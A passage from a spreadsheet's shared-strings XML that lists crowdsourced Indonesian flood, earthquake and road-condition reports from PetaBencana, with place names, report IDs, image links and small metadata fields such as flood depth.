    <t>Samarinda</t>
  </si>
  <si>
    <t>7c4ac0bc-1feb-4c05-be9e-7cd4f33ff605</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c4ac0bc-1feb-4c05-be9e-7cd4f33ff605.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-LA" }</t>
  </si>
  <si>
    <t>Air banjir dari arah bkp/kemiling turun ke rajabasa (bandar lampung)</t>
  </si>
  <si>
    <t>Rajabasa</t>
  </si>
  <si>
    <t>Bandar Lampung</t>
  </si>
  <si>
    <t>59817d51-a29e-4288-b70f-e86de3a8f8be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/59817d51-a29e-4288-b70f-e86de3a8f8be.jpg</t>
  </si>
  <si>
    <t>Gunung Lingai</t>
  </si>
  <si>
    <t>Sungai Pinang</t>
  </si>
  <si>
    <t>e4731ea2-cc04-49ca-8827-a2c296d8d3a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e4731ea2-cc04-49ca-8827-a2c296d8d3a9.jpg</t>
  </si>
  <si>
    <t>Selamat hari raya #dirumahaja #banjir</t>
  </si>
  <si>
    <t>Temindung Permai</t>
  </si>
  <si>
    <t>4fb777e4-8739-4352-99fe-6b1c1344e030</t>
  </si>
  <si>
    <t>Banjir di Kalimantan Timur, Samarinda. Kemarin pagi ( 23 may 2020 ) air banjir sudah mulai naik tapi turun sampai jam 12 siang.</t>
  </si>
  <si>
    <t>49459e3a-7905-4a94-85c7-dfad220616a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49459e3a-7905-4a94-85c7-dfad220616a0.jpg</t>
  </si>
  <si>
    <t>Banjir bosss</t>
  </si>
  <si>
    <t>ed3b010f-8aac-41d4-a56f-4ff64e29d169</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ed3b010f-8aac-41d4-a56f-4ff64e29d169.jpg</t>
  </si>
  <si>
    <t>Banjir Simpang 4 Lembuswana Kota Samarinda</t>
  </si>
  <si>
    <t>Gunung Kelua</t>
  </si>
  <si>
    <t>425a36be-83fc-4755-bba7-224076202299</t>
  </si>
  <si>
    <t>https://images.petabencana.id/425a36be-83fc-4755-bba7-224076202299.jpg</t>
  </si>
  <si>
    <t>Banjir sudah 3 hari, saat ini hari yg ke 4.</t>
  </si>
  <si>
    <t>Sempaja Utara</t>
  </si>
  <si>
    <t>Samarinda Utara</t>
  </si>
  <si>
    <t>1ee2a648-3739-4681-8161-63d8dd60f98e</t>
  </si>
  <si>
    <t>Sudah 4 hari banjir</t>
  </si>
  <si>
    <t>bc2d89fa-56c5-41ef-baf6-0d0ec2e6498a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bc2d89fa-56c5-41ef-baf6-0d0ec2e6498a.jpg</t>
  </si>
  <si>
    <t>Lokasi Jalan Kesehatan Dalam dengan tinggi lebih dari 44 cm</t>
  </si>
  <si>
    <t>8833e7ec-f00e-4e3f-8cbd-a42a2be71127</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8833e7ec-f00e-4e3f-8cbd-a42a2be71127.jpg</t>
  </si>
  <si>
    <t>Banjir selutut bossque</t>
  </si>
  <si>
    <t>Medokan Ayu</t>
  </si>
  <si>
    <t>Rungkut</t>
  </si>
  <si>
    <t>bfbe3d46-50e4-4e9f-a668-d8416e537610</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bfbe3d46-50e4-4e9f-a668-d8416e537610.jpg</t>
  </si>
  <si>
    <t>Banjir setelah hujan seharian</t>
  </si>
  <si>
    <t>Gunung Anyar Tambak</t>
  </si>
  <si>
    <t>87adbcb7-bc8f-4559-a037-4b33c556da7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/87adbcb7-bc8f-4559-a037-4b33c556da7a.jpg</t>
  </si>
  <si>
    <t>Banjir melanda Wonorejo dan sekitarnya.</t>
  </si>
  <si>
    <t>Wonorejo</t>
  </si>
  <si>
    <t>67efcee5-1614-4b90-a837-3df53f6b5f49</t>
  </si>
  <si>
    <t>Banjirrr terpantau hampir selutut slurrr</t>
  </si>
  <si>
    <t>Kali Rungkut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rQotoT1MymRGbiGAQbhnt_AiEL8_7xVSgFUGM2lWwYrNHmd5xiVLN38RgaiyiAg5QxM0JJMJRLEiZQMSETrDaLWYkA93=s480-c</t>
  </si>
  <si>
    <t>banjir di jalan putra bangsa medokan ayu</t>
  </si>
  <si>
    <t>dd20b299-f1b3-43c1-af3a-7635bd403abe</t>
  </si>
  <si>
    <t>Banjir di tenggilis baru, kalo di sini banjir dikit biasanya di sungai tenggilis udah mbludak. Apalagi di sini udah lebih tinggi juga.</t>
  </si>
  <si>
    <t>Tenggilis Mejoyo</t>
  </si>
  <si>
    <t>19b8de2a-fdfa-4237-b3a8-696dc9e4e212</t>
  </si>
  <si>
    <t>https://images.petabencana.id/19b8de2a-fdfa-4237-b3a8-696dc9e4e212.jpg</t>
  </si>
  <si>
    <t>Di dalem rumah di atas mata kaki, di luar rumah selutut orang dewasa.</t>
  </si>
  <si>
    <t>Pepelegi</t>
  </si>
  <si>
    <t>0bf59c90-8208-4d0b-99bd-11817bfbfce9</t>
  </si>
  <si>
    <t>Hujan deras dari siang gabisa apa ada pemecah hujan biar ga kumpul di rungkut lagi rungkut lagi.. Buang ke laut lah</t>
  </si>
  <si>
    <t>0ecb41a8-cb48-4cc6-bad3-12c6ff09dc94</t>
  </si>
  <si>
    <t>Probolinggo banjir</t>
  </si>
  <si>
    <t>Jrebeng Kidul</t>
  </si>
  <si>
    <t>Wonoasih</t>
  </si>
  <si>
    <t>Probolinggo</t>
  </si>
  <si>
    <t>530b0cb5-25b1-4fb3-978c-68845a3aff61</t>
  </si>
  <si>
    <t>Banjirnya tinggi</t>
  </si>
  <si>
    <t>d3232000-dea1-48da-8b39-d5f6efbba388</t>
  </si>
  <si>
    <t>banyak air</t>
  </si>
  <si>
    <t>Morokrembangan</t>
  </si>
  <si>
    <t>Krembangan</t>
  </si>
  <si>
    <t>550b95a9-9028-497f-98f4-3126b803e59f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/550b95a9-9028-497f-98f4-3126b803e59f.jpg</t>
  </si>
  <si>
    <t>disini sering banjir sekisaran 50 cm ka di daerah pucang jajar smamda4 banyak sekali mobil sepeda motor yang mogok di sini"</t>
  </si>
  <si>
    <t>307e2881-c086-4553-bacf-9fbde5d4ca5e</t>
  </si>
  <si>
    <t>Gak ada hujan tpi knpa banjir</t>
  </si>
  <si>
    <t>7476ac5f-61e9-42b5-b8e7-9b6c1c855234</t>
  </si>
  <si>
    <t>sangat membantu walaupun saya di luar Jabodetabek</t>
  </si>
  <si>
    <t>1ed61fb9-43e7-4879-ba0f-94ebfae63dbf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ed61fb9-43e7-4879-ba0f-94ebfae63dbf.jpg</t>
  </si>
  <si>
    <t>Banjir niih</t>
  </si>
  <si>
    <t>b6e06f88-ba31-428d-9bdb-a8aa9670ce60</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b6e06f88-ba31-428d-9bdb-a8aa9670ce60.jpg</t>
  </si>
  <si>
    <t>Lapor Banjir: Banjir tiga desa di daerah lombok tengah pada hari jumat di karenakan air sungai yang meluap, menggenangi beberapa rumah.</t>
  </si>
  <si>
    <t>Mujur</t>
  </si>
  <si>
    <t>Praya Timur</t>
  </si>
  <si>
    <t>Lombok Tengah</t>
  </si>
  <si>
    <t>3b1a60d8-17e7-4837-abdc-edfd5b7df003</t>
  </si>
  <si>
    <t>Banjir mulai datang dari arah barat dan mulai surut</t>
  </si>
  <si>
    <t>Tegal Rejo</t>
  </si>
  <si>
    <t>Kelumpang Hilir</t>
  </si>
  <si>
    <t>64731afc-a41e-4cd3-bcc6-a2ba622470ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64731afc-a41e-4cd3-bcc6-a2ba622470ed.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 160 }</t>
  </si>
  <si>
    <t>Fto aq</t>
  </si>
  <si>
    <t>Patangpuluhan</t>
  </si>
  <si>
    <t>Wirobrajan</t>
  </si>
  <si>
    <t>Kota Yogyakarta</t>
  </si>
  <si>
    <t>bc63cfb4-ec2a-459a-ab6b-436b6cd6995e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bc63cfb4-ec2a-459a-ab6b-436b6cd6995e.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 43, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-BA" }</t>
  </si>
  <si>
    <t>banjir karena hujan badai, terjadi pada tanggal 1 Juni 2020</t>
  </si>
  <si>
    <t>Seminyak</t>
  </si>
  <si>
    <t>Kuta</t>
  </si>
  <si>
    <t>Badung</t>
  </si>
  <si>
    <t>Bali</t>
  </si>
  <si>
    <t>79d9b760-5c69-4a58-adf7-8fd442b4dda9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/79d9b760-5c69-4a58-adf7-8fd442b4dda9.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 0 }</t>
  </si>
  <si>
    <t>aman guys</t>
  </si>
  <si>
    <t>Jabon</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/5OcmTzj5zZonOSyB8VmA7TlItpxRC7Qc5bjkVaHN5MjxY6Phv3qWcaHXlyc0t2jtZlv1qPZU9OnJg0U8FLS6E7ciirq-=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1828", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tlng dibersihin dan dirapihkan gotny, karena airny meluber ke jalan, lokasi di blok F7B</t>
  </si>
  <si>
    <t>b52c7580-aa05-464c-84c4-5fe46b26ab02</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b52c7580-aa05-464c-84c4-5fe46b26ab02.jpg</t>
  </si>
  <si>
    <t>#banjir</t>
  </si>
  <si>
    <t>Gunung Sindur</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/IDdxB1LFvCq380U212ci3hJqo5FFvZGi2vs2l2kL_-3uyDflgclWQB_CXfBRLtNFT8Nwkfyc0ibjFTyu6aThLFo1PQkO=s480-c</t>
  </si>
  <si>
    <t>tolong dong dpan sintesis sakuranya di keruk biar gak banjir mulu</t>
  </si>
  <si>
    <t>277e8c94-ed0e-4e13-b65d-8370657df9a4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/277e8c94-ed0e-4e13-b65d-8370657df9a4.jpg</t>
  </si>
  <si>
    <t>Banjir air pasang dari sungai kali kamal. Karna sungai terlalu dangkal.</t>
  </si>
  <si>
    <t>Kaliwlingi</t>
  </si>
  <si>
    <t>Brebes</t>
  </si>
  <si>
    <t>6c760d7f-a3ce-4abe-a708-2422d1509ef2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c760d7f-a3ce-4abe-a708-2422d1509ef2.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2418", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir rob</t>
  </si>
  <si>
    <t>d392b6f5-31a1-4ae3-932d-d2e3c9c9c434</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d392b6f5-31a1-4ae3-932d-d2e3c9c9c434.jpg</t>
  </si>
  <si>
    <t>Fenomena banjir rob di Jalan Sidomukti daerah Pekalongan dekat pesisir pantai airnya makin meluap.</t>
  </si>
  <si>
    <t>Sokorejo</t>
  </si>
  <si>
    <t>Pekalongan Timur</t>
  </si>
  <si>
    <t>b64906ec-7d48-4643-94f9-56f9fd025d22</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b64906ec-7d48-4643-94f9-56f9fd025d22.jpg</t>
  </si>
  <si>
    <t>Pelabuhan sunda kelapa airnya meluap sudab kerumah rumah warga</t>
  </si>
  <si>
    <t>46e2623f-607d-49e6-b689-b32835a1507c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46e2623f-607d-49e6-b689-b32835a1507c.jpg</t>
  </si>
  <si>
    <t>Meluapnya air dari pelabuhan sunda kelapa</t>
  </si>
  <si>
    <t>f4cddc41-290d-44cd-9940-89e9cf60c9fe</t>
  </si>
  <si>
    <t>Banjir menggenang wilayah Muara Angke, Pluit. ketinggian air bervariasi dari 30-60 cm (kurang lebih)</t>
  </si>
  <si>
    <t>5f6cdc2a-f319-452a-afbd-d058178580cc</t>
  </si>
  <si>
    <t>Banjir di wilayah Muara Angke</t>
  </si>
  <si>
    <t>3f48f701-a5bb-4121-9eb6-87482a82e9c7</t>
  </si>
  <si>
    <t>Banjir di depan SMPN 261 jakarta</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/s9noAv18Jo2dsQQB4pc59D0NUbm1sZbmPPosjZ6zziIimR-35kyjcBLq8O5prow-FAHqWlbO958ms6AqtJqDDYlQRQCW=s480-c</t>
  </si>
  <si>
    <t>evaluasi sedimen2 ini ya</t>
  </si>
  <si>
    <t>aaf88d4b-645f-4a04-8ee3-18eedce50f9c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aaf88d4b-645f-4a04-8ee3-18eedce50f9c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2282", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>87dee64a-de4f-4ae8-905d-6bddf21efbc1</t>
  </si>
  <si>
    <t>Banjir didaerah Morodemak, Bonang, Demak. Dikarenakan banjir rob oleh luapnya air laut, setiap hari aktifitas penduduk terganggu,</t>
  </si>
  <si>
    <t>Morodemak</t>
  </si>
  <si>
    <t>Bonang</t>
  </si>
  <si>
    <t>7931defc-392d-4a28-ae52-a16e00dd38b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7931defc-392d-4a28-ae52-a16e00dd38b2.jpg</t>
  </si>
  <si>
    <t>Banjir rob setiap hari, info lanjut di ig @demakhariini ada semua video banjir daerah Bonang, Demak</t>
  </si>
  <si>
    <t>Tambakbulusan</t>
  </si>
  <si>
    <t>6f31b8da-6aa7-4b81-bdd8-368197e73e8b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f31b8da-6aa7-4b81-bdd8-368197e73e8b.jpg</t>
  </si>
  <si>
    <t>Krapyak Lor</t>
  </si>
  <si>
    <t>Pekalongan Utara</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3T-NlqZjQvAzTBHOuWn2hch5Rh93_Vk4vHWKlaI6oRRhSqMcC3EnxM7YGYyUgbl41fxqEqoWyv6RP6SCz7NmeNMZsqc=s480-c</t>
  </si>
  <si>
    <t>banjirnya makin tinggi tolong d tindak lanjutkan jl penghulu RT 01 RW 10 terima kasih</t>
  </si>
  <si>
    <t>e936a776-28c1-4eb2-9664-a6e2189faccf</t>
  </si>
  <si>
    <t>Banjir akibat hujan yang sangat deras</t>
  </si>
  <si>
    <t>50642375-de44-4a4b-b4ec-7f5fd5dce085</t>
  </si>
  <si>
    <t>https://images.petabencana.id/50642375-de44-4a4b-b4ec-7f5fd5dce085.jpg</t>
  </si>
  <si>
    <t>Banjir di pasir gintung Bandar Lampung, 12 juni 2020</t>
  </si>
  <si>
    <t>Pasir Gintung</t>
  </si>
  <si>
    <t>Tanjung Karang Pusat</t>
  </si>
  <si>
    <t>c54710f0-8398-4e10-8e5e-152716c4df6c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c54710f0-8398-4e10-8e5e-152716c4df6c.jpg</t>
  </si>
  <si>
    <t>Labuhan Ratu</t>
  </si>
  <si>
    <t>428ffc69-4455-4ee7-82c9-9e86cd20a3c5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/428ffc69-4455-4ee7-82c9-9e86cd20a3c5.jpg</t>
  </si>
  <si>
    <t>Banjir yg disebabkan meluapnya Sungai Bone di Kabupaten Bonebolango, Gorontalo &amp; bberapa daerah di Kota Gorontalo spt Kampung Bugis &amp; Ipilo.</t>
  </si>
  <si>
    <t>Pauwo</t>
  </si>
  <si>
    <t>Kabila</t>
  </si>
  <si>
    <t>Bone Bolango</t>
  </si>
  <si>
    <t>53b26af2-c8b0-4b5a-a775-a4de2b75bb38</t>
  </si>
  <si>
    <t>Banjir Bone Bolango dan Kota Gorontalo</t>
  </si>
  <si>
    <t>Tenggela</t>
  </si>
  <si>
    <t>Tilango</t>
  </si>
  <si>
    <t>64876615-fd06-49c1-b2b3-e419d99a3f2d</t>
  </si>
  <si>
    <t>Banjit</t>
  </si>
  <si>
    <t>Prawirodirjan</t>
  </si>
  <si>
    <t>Gondomanan</t>
  </si>
  <si>
    <t>31657195-e883-480c-aacd-cb0d3cb8e318</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31657195-e883-480c-aacd-cb0d3cb8e318.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 113 }</t>
  </si>
  <si>
    <t>Air meluap secara tiba tiba pada pukul 19:30 WITA menggenang daerah perbatasan Kab. Bantaeng - Jeneponto</t>
  </si>
  <si>
    <t>Bonto Sunggu</t>
  </si>
  <si>
    <t>Bissappu</t>
  </si>
  <si>
    <t>Bantaeng</t>
  </si>
  <si>
    <t>2637a562-d9b7-436b-ae07-21a4568db77c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2637a562-d9b7-436b-ae07-21a4568db77c.jpg</t>
  </si>
  <si>
    <t>BANJIR DI DAERAH BANTAENG DAN JENEPONTO SULAWESI SELATAN</t>
  </si>
  <si>
    <t>d9560f85-5224-48ec-b91b-80c8a24de203</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9560f85-5224-48ec-b91b-80c8a24de203.jpg</t>
  </si>
  <si>
    <t>Foto diambil setelah air surut lokasi di jalan mangga kelurahan tappanjeng kec bantaeng kab bantaeng</t>
  </si>
  <si>
    <t>fb98cad2-2e20-4734-9731-81693998f413</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb98cad2-2e20-4734-9731-81693998f413.jpg</t>
  </si>
  <si>
    <t>Bonto Lebang</t>
  </si>
  <si>
    <t>2e8e70c4-952f-46ef-ab4b-72fdde4e742c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e8e70c4-952f-46ef-ab4b-72fdde4e742c.jpg</t>
  </si>
  <si>
    <t>Banjir ROB pekalongan</t>
  </si>
  <si>
    <t>Panjang Wetan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/352952</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/06/16/15923213071146711785.jpg</t>
  </si>
  <si>
    <t>Curah Hujan Tinggi, Air Sungai di Jalan Cot Girek Meluap</t>
  </si>
  <si>
    <t>ACEH UTARA, Aceh - Akibat curah hujan yang tinggi, air sungai meluap ke badan jalan di jalan Cot Girek, Lhoksukon, Aceh Utara selasa (16/06/2020).</t>
  </si>
  <si>
    <t>Blang Peuria</t>
  </si>
  <si>
    <t>Samudera</t>
  </si>
  <si>
    <t>Aceh Utara</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/PexMeD9Qv9IhZ7TBzjcR18g2kQ4Oj6FucZev0IchmLR8i-yFt7LpnZdwF0jIVvmfFSc5xgkI__UDYZfvXvSi4H0gtjUN=s480-c</t>
  </si>
  <si>
    <t>Selokan terlalu kecil dan dangkal, pembuangan air naik ke jalan. menyebarkan bau tidak sedap ke sekitar.</t>
  </si>
  <si>
    <t>Rawabadak Selatan</t>
  </si>
  <si>
    <t>d4c3949c-b99a-416d-bad5-ede7a94163cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d4c3949c-b99a-416d-bad5-ede7a94163cf.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 121, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-RI" }</t>
  </si>
  <si>
    <t>Telah terjadi bencana banjir di Jalan Melati, disini terjadi kehilangan beberapa usaha masyarakat yang berjualan bubur ayam.</t>
  </si>
  <si>
    <t>Delima</t>
  </si>
  <si>
    <t>Tampan</t>
  </si>
  <si>
    <t>Pekanbaru</t>
  </si>
  <si>
    <t>Riau</t>
  </si>
  <si>
    <t>879aa94e-4615-4ffd-8e2e-f594052e3002</t>
  </si>
  <si>
    <t>hujan</t>
  </si>
  <si>
    <t>Lesanpuro</t>
  </si>
  <si>
    <t>Kedungkandang</t>
  </si>
  <si>
    <t>e2a73110-5b51-4f0e-ad7a-f3a5ec19f46b</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 0, "condition": 0 }</t>
  </si>
  <si>
    <t>hanya terasa bangunan bergetar 5 detik</t>
  </si>
  <si>
    <t>Catur Tunggal</t>
  </si>
  <si>
    <t>957bdcb7-7bd8-4362-b720-1665b3637899</t>
  </si>
  <si>
    <t>{ "points": 1, "condition": 0, "report_type": "road", "accessabilityFailure": 4 }</t>
  </si>
  <si>
    <t>Semua dalam keadaan baik</t>
  </si>
  <si>
    <t>Sendangijo</t>
  </si>
  <si>
    <t>Selogiri</t>
  </si>
  <si>
    <t>Wonogiri</t>
  </si>
  <si>
    <t>2c1ad05c-4aa0-4a62-bb56-78d39bb1f0c4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2c1ad05c-4aa0-4a62-bb56-78d39bb1f0c4.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "structure", "structureFailure": 2 }</t>
  </si>
  <si>
    <t>saya merasakan gempa saat bermain di senyumpoker, untung saja bisa raih jackpotnya</t>
  </si>
  <si>
    <t>Pulau Untung Jawa</t>
  </si>
  <si>
    <t>Kepulauan Seribu Selatan</t>
  </si>
  <si>
    <t>Kepulauan Seribu</t>
  </si>
  <si>
    <t>f900ec13-351d-402e-8c6c-e01c8c2e98e5</t>
  </si>
  <si>
    <t>gempa</t>
  </si>
  <si>
    <t>Bangunjiwo</t>
  </si>
  <si>
    <t>Kasihan</t>
  </si>
  <si>
    <t>Bantul</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/KKj5zsKF-4HdBWcjxmobyI8_qGPjZg3_Plc_nrlh-rhJqcK7Vv7hWyolOt_t4HS0MIBh5Hq3qud6MEMKGe9wnlYrkzB9=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1543", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#saluran mampet tolong di TL</t>
  </si>
  <si>
    <t>49bb36b1-d222-4a41-8f34-ab8d272bf0ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49bb36b1-d222-4a41-8f34-ab8d272bf0ac.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-KB" }</t>
  </si>
  <si>
    <t>Banjir telah terjadi selama kurang lebih sepekan terakhir, curah hujan sedang terus turun setiap harinya menyebabkan air meluap ke jalan.</t>
  </si>
  <si>
    <t>Riam Danau Kanan</t>
  </si>
  <si>
    <t>Jelai Hulu</t>
  </si>
  <si>
    <t>Ketapang</t>
  </si>
  <si>
    <t>Kalimantan Barat</t>
  </si>
  <si>
    <t>84f78030-6421-405d-86a0-15fcbd6e98ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/84f78030-6421-405d-86a0-15fcbd6e98ea.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-BE" }</t>
  </si>
  <si>
    <t>Jalan Baru</t>
  </si>
  <si>
    <t>Rejang Lebong</t>
  </si>
  <si>
    <t>Bengkulu</t>
  </si>
  <si>
    <t>dc2c61da-4623-413a-8dc8-783cdb42c2a4</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 192 }</t>
  </si>
  <si>
    <t>Meluap</t>
  </si>
  <si>
    <t>Papango</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ajpBI_2J8YGFxdVmSDla2CTZ8hj_yPhWy5XB7PY8qdj_D20VovtvY-n28T4eYCj7gXXn_e1w143RA5nQshDy55Elya5ZJA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1810", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sepanjang jalan ini perlu saluran air supaya segera dibuatkan agar tidak banjir.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/9b0NSKsiApJxRHDwVov7jVreG47beNk5TTa3Qwr88ATjsCpvk-YqqKBfV2qcDGOcwu7c1h_ed-8VRRRzEfx1-baY5wd1=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1119", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjirrrrrr</t>
  </si>
  <si>
    <t>Tegal Parang</t>
  </si>
  <si>
    <t>ce6e828d-5878-4944-abc8-b29c4b9b1d42</t>
  </si>
  <si>
    <t>Banyak rumah yg terendam</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/suNANZt0fbjMz_d5D00efgf5qRborZfxG7im49L__XsGDGzwofOIiMc03WRTrv6o5gRiW0YkcmqxdHSitbgtIAyS1jJV=s480-c</t>
  </si>
  <si>
    <t>baru hujan sebentar sdh hampir penuh.. jika memungkunkan kuras semua saluran yg ada di satria krn sdh dangkal. trimakasih</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4-v_vIjkujck3DlKEYMdwCHqwMV_Kr7DLBZ1amko_dER5UZWhL5oX-lbP2Z4ypZlqEXEquIvg3NPCHpdwHNcInW2coGt=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2464", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sampah n banjir menguap tolong segera d atasi</t>
  </si>
  <si>
    <t>Roa Malaka</t>
  </si>
  <si>
    <t>b63705b6-eea7-42fb-bea4-34cbc58546f7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b63705b6-eea7-42fb-bea4-34cbc58546f7.jpg</t>
  </si>
  <si>
    <t>Kalo ujan besar gini pasti banjir dan kalo yg rumahnya pendek udh masuk kedalem</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/0xH0CWfrD7KXpgmBT6XeNYxI3rfI20PLNDsLE1oWxXLTmy_jARu-VDrM4-SqV-htLJx3BkvwKDRd4BitpLIGMAbeqss=s480-c</t>
  </si>
  <si>
    <t>Mohon dilanjutkan pengerjaan pelebaran saluran yg terhenti sdh 2 bulan lokasi Jalan Griya Ratna blok J RT 010, RW 020 trims..Benny</t>
  </si>
  <si>
    <t>104db897-1677-414f-8c20-479a47caaa8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/104db897-1677-414f-8c20-479a47caaa8f.jpg</t>
  </si>
  <si>
    <t>Gunung Bahagia</t>
  </si>
  <si>
    <t>9f6b2517-3989-4465-a79e-b6736449760b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9f6b2517-3989-4465-a79e-b6736449760b.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 117 }</t>
  </si>
  <si>
    <t>Tenda</t>
  </si>
  <si>
    <t>Hulonthalangi</t>
  </si>
  <si>
    <t>7db0dfca-4a7e-474b-a5df-ed3f85e31956</t>
  </si>
  <si>
    <t>gempa sebentar</t>
  </si>
  <si>
    <t>Sardonoharjo</t>
  </si>
  <si>
    <t>9ca674c3-79a2-40b5-b082-0522e42576d7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ca674c3-79a2-40b5-b082-0522e42576d7.jpg</t>
  </si>
  <si>
    <t>banjir di talang babungo.saya kurang tau banjir nya sedalam apa,karna saya hanya lihat tweet an orang dan saya ingin ikut membantu.trimakasi</t>
  </si>
  <si>
    <t>00e88dc4-d767-4a82-961b-8acb21352777</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 200 }</t>
  </si>
  <si>
    <t>Dalem</t>
  </si>
  <si>
    <t>8413a0c2-0ae4-48ac-8f72-9ff58c7936c2</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 2, "condition": 0 }</t>
  </si>
  <si>
    <t>Gempa terjadi kurang lebih pukul 06.00</t>
  </si>
  <si>
    <t>Giwangretno</t>
  </si>
  <si>
    <t>Sruweng</t>
  </si>
  <si>
    <t>Kebumen</t>
  </si>
  <si>
    <t>9480b209-dcaf-4c66-8952-d680ab59a5fe</t>
  </si>
  <si>
    <t>{ "points": 0, "report_type": "structure", "structureFailure": 0 }</t>
  </si>
  <si>
    <t>Gempa ihh</t>
  </si>
  <si>
    <t>4f284afc-d909-47f6-9a1c-44e93aae857b</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 0, "condition": 2 }</t>
  </si>
  <si>
    <t>kecelakaan</t>
  </si>
  <si>
    <t>Gunungsari</t>
  </si>
  <si>
    <t>Jatisrono</t>
  </si>
  <si>
    <t>1dbab038-2f52-4aed-80ab-a4cec9f211d8</t>
  </si>
  <si>
    <t>Daerag lereng gunung merapi gak pernah banjirr</t>
  </si>
  <si>
    <t>Dukun</t>
  </si>
  <si>
    <t>b3862e2f-7efb-48e1-81d1-7cd028a3977d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b3862e2f-7efb-48e1-81d1-7cd028a3977d.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 5, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SB" }</t>
  </si>
  <si>
    <t>Saya dapat dari website Antara Sumbar. https://sumbar.antaranews.com/amp/berita/371190/banjir-genangi-sejumlah-rumah-warga-di-padang</t>
  </si>
  <si>
    <t>Parupuk Tabing</t>
  </si>
  <si>
    <t>Koto Tangah</t>
  </si>
  <si>
